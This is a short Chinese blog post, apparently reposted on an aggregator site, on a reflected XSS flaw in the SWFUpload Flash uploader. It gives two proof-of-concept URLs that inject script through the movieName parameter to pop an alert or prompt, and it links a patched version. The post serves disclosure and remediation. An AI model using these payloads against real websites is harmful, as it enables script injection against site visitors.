概述
一、swfupload.swf简介
SWFUpload 是一款优秀的 Flash 上传控件,它可以非常好的增强 Web 端程序的用户上传体验。SWFUpload 自由灵活的 JavaScript 接口允许开发者自定义包括 HTML/CSS 在内的几乎所有 UI 样式,被广泛运用在大量站点的上传模块中,如 Youtube 和 WordPress 。
此漏洞可能导致严重的 XSS 安全隐患,但是官方一直没有修复。
二、漏洞复现
payload如下
http://XXX/images/swfupload/swfupload.swf?movieName=%22])}catch(e){prompt(123)}//
或者swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%28123%29;//
三、漏洞修复
网站搜了很多资料,也下载了很多说是已修复的Swfupload.swf,但是测试后,发现都是没有修复,后来仔细找到GitHub上有一个,是真修复的,分享连接:https://github.com/yoozi/swfupload-xss-security-fix,里面有使用说明书,亲测可用。
更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
最后
以上就是笨笨眼神为你收集整理的Swfupload.swf 跨站脚本——漏洞复现的全部内容,希望文章能够帮你解决Swfupload.swf 跨站脚本——漏洞复现所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复